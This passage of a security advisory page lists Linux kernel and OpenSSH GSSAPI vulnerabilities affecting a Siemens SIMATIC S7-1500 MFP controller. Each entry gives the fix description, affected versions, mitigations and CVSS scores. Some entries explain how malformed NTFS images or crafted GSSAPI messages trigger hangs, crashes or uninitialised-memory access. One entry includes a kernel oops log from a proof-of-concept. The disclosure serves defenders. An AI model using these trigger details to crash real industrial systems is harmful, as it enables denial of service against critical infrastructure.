<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: bcm-sba-raid: fix device leak on probe Make sure to drop the reference taken when looking up the mailbox device during probe on probe failures and on driver unbind.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71190">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71191</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: at_hdmac: fix device leak on of_dma_xlate() Make sure to drop the reference taken when looking up the DMA platform device during of_dma_xlate() when releasing channel resources. Note that commit 3832b78b3ec2 ("dmaengine: at_hdmac: add missing put_device() call in at_dma_xlate()") fixed the leak in a couple of error paths but the reference is still leaking on successful allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71191">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71197</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: w1: therm: Fix off-by-one buffer overflow in alarms_store The sysfs buffer passed to alarms_store() is allocated with 'size + 1' bytes and a NUL terminator is appended. However, the 'size' argument does not account for this extra byte. The original code then allocated 'size' bytes and used strcpy() to copy 'buf', which always writes one byte past the allocated buffer since strcpy() copies until the NUL terminator at index 'size'. Fix this by parsing the 'buf' parameter directly using simple_strtoll() without allocating any intermediate memory or string copying. This removes the overflow while simplifying the code.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71197">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71221</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: mmp_pdma: Fix race condition in mmp_pdma_residue() Add proper locking in mmp_pdma_residue() to prevent use-after-free when accessing descriptor list and descriptor contents. The race occurs when multiple threads call tx_status() while the tasklet on another CPU is freeing completed descriptors: CPU 0 CPU 1 ----- ----- mmp_pdma_tx_status() mmp_pdma_residue() -&gt; NO LOCK held list_for_each_entry(sw, ..) DMA interrupt dma_do_tasklet() -&gt; spin_lock(&amp;desc_lock) list_move(sw-&gt;node, ...) spin_unlock(&amp;desc_lock) | dma_pool_free(sw) &lt;- FREED! -&gt; access sw-&gt;desc &lt;- UAF! This issue can be reproduced when running dmatest on the same channel with multiple threads (threads_per_chan &gt; 1). Fix by protecting the chain_running list iteration and descriptor access with the chan-&gt;desc_lock spinlock.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71221">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71265</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: ntfs3: fix infinite loop in attr_load_runs_range on inconsistent metadata We found an infinite loop bug in the ntfs3 file system that can lead to a Denial-of-Service (DoS) condition. A malformed NTFS image can cause an infinite loop when an attribute header indicates an empty run list, while directory entries reference it as containing actual data. In NTFS, setting evcn=-1 with svcn=0 is a valid way to represent an empty run list, and run_unpack() correctly handles this by checking if evcn + 1 equals svcn and returning early without parsing any run data. However, this creates a problem when there is metadata inconsistency, where the attribute header claims to be empty (evcn=-1) but the caller expects to read actual data. When run_unpack() immediately returns success upon seeing this condition, it leaves the runs_tree uninitialized with run-&gt;runs as a NULL. The calling function attr_load_runs_range() assumes that a successful return means that the runs were loaded and sets clen to 0, expecting the next run_lookup_entry() call to succeed. Because runs_tree remains uninitialized, run_lookup_entry() continues to fail, and the loop increments vcn by zero (vcn += 0), leading to an infinite loop. This patch adds a retry counter to detect when run_lookup_entry() fails consecutively after attr_load_runs_vcn(). If the run is still not found on the second attempt, it indicates corrupted metadata and returns -EINVAL, preventing the Denial-of-Service (DoS) vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71265">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71266</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: ntfs3: check return value of indx_find to avoid infinite loop We found an infinite loop bug in the ntfs3 file system that can lead to a Denial-of-Service (DoS) condition. A malformed dentry in the ntfs3 filesystem can cause the kernel to hang during the lookup operations. By setting the HAS_SUB_NODE flag in an INDEX_ENTRY within a directory's INDEX_ALLOCATION block and manipulating the VCN pointer, an attacker can cause the indx_find() function to repeatedly read the same block, allocating 4 KB of memory each time. The kernel lacks VCN loop detection and depth limits, causing memory exhaustion and an OOM crash. This patch adds a return value check for fnd_push() to prevent a memory exhaustion vulnerability caused by infinite loops. When the index exceeds the size of the fnd-&gt;nodes array, fnd_push() returns -EINVAL. The indx_find() function checks this return value and stops processing, preventing further memory allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71266">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71267</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: ntfs3: fix infinite loop triggered by zero-sized ATTR_LIST We found an infinite loop bug in the ntfs3 file system that can lead to a Denial-of-Service (DoS) condition. A malformed NTFS image can cause an infinite loop when an ATTR_LIST attribute indicates a zero data size while the driver allocates memory for it. When ntfs_load_attr_list() processes a resident ATTR_LIST with data_size set to zero, it still allocates memory because of al_aligned(0). This creates an inconsistent state where ni-&gt;attr_list.size is zero, but ni-&gt;attr_list.le is non-null. This causes ni_enum_attr_ex to incorrectly assume that no attribute list exists and enumerates only the primary MFT record. When it finds ATTR_LIST, the code reloads it and restarts the enumeration, repeating indefinitely. The mount operation never completes, hanging the kernel thread. This patch adds validation to ensure that data_size is non-zero before memory allocation. When a zero-sized ATTR_LIST is detected, the function returns -EINVAL, preventing a DoS vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71267">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-3497</a></h3>
<div class="csaf-accordion-content">
<p>Vulnerability in the OpenSSH GSSAPI delta included in various Linux distributions. This vulnerability affects the GSSAPI patches added by various Linux distributions and does not affect the OpenSSH upstream project itself. The usage of sshpkt_disconnect() on an error, which does not terminate the process, allows an attacker to send an unexpected GSSAPI message type during the GSSAPI key exchange to the server, which will call the underlying function and continue the execution of the program without setting the related connection variables. As the variables are not initialized to NULL the code later accesses those uninitialized variables, accessing random memory, which could lead to undefined behavior. The recommended workaround is to use ssh_packet_disconnect() instead, which does terminate the process. The impact of the vulnerability depends heavily on the compiler flag hardening configuration.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-3497">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -&gt; put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr-&gt;ee from skb-&gt;cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb-&gt;cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff &lt;0f&gt; 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2-&gt;cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/489.html">CWE-489 Active Debug Code</a></p>
<hr>
